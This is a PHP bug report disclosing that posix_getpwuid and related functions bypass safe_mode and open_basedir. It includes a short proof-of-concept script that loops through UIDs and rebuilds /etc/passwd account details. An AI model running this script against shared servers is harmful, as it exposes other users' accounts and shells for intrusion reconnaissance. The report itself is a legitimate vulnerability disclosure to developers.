From: [EMAIL PROTECTED]
Operating system: Unix
PHP version: 4.2.0
PHP Bug Type: *General Issues
Bug description: posix_getpw* bypasses safe_mode and open_basedir
I noticed that many of the posix_* functions DO NOT check wether safe_mode
or open_basedir restrict access to the user database thus allowing a user
to rebuild a complete /etc/passwd without permissions to read /etc/passwd
or access the /etc directory.
This is dangerous in some cases where login are kept secret as it allows a
user to know what accounts have what privileges and what accounts have
access to a shell or not.
For now there is only one thing to do, disable these functions but i'm
pretty sure that adding checks to see values of safe_mode and/or
open_basedir would be a nice thing to do.
Here's a script that rebuilds /etc/passwd when safe_mode is enabled and
open_basedir is set to the user homedirectory:
<?
for ($i = 0; $i < 60000; $i++)
{
if (($tab = @posix_getpwuid($i)) != NULL)
{
echo $tab['name'].":";
echo $tab['passwd'].":";
echo $tab['uid'].":";
echo $tab['gid'].":";
echo $tab['gecos'].":";
echo $tab['dir'].":";
echo $tab['shell']."<br>";
}
}
?>
On a very large system, if an execution time is set, this will not end up,
but hopefully the posix_getpwent() function is missing so the user has to
go through all possible uid's.
--
Edit bug report at http://bugs.php.net/?id=16733&edit=1
--
Fixed in CVS: http://bugs.php.net/fix.php?id=16733&r=fixedcvs
Fixed in release: http://bugs.php.net/fix.php?id=16733&r=alreadyfixed
Need backtrace: http://bugs.php.net/fix.php?id=16733&r=needtrace
Try newer version: http://bugs.php.net/fix.php?id=16733&r=oldversion
Not developer issue: http://bugs.php.net/fix.php?id=16733&r=support
Expected behavior: http://bugs.php.net/fix.php?id=16733&r=notwrong
Not enough info: http://bugs.php.net/fix.php?id=16733&r=notenoughinfo
Submitted twice: http://bugs.php.net/fix.php?id=16733&r=submittedtwice
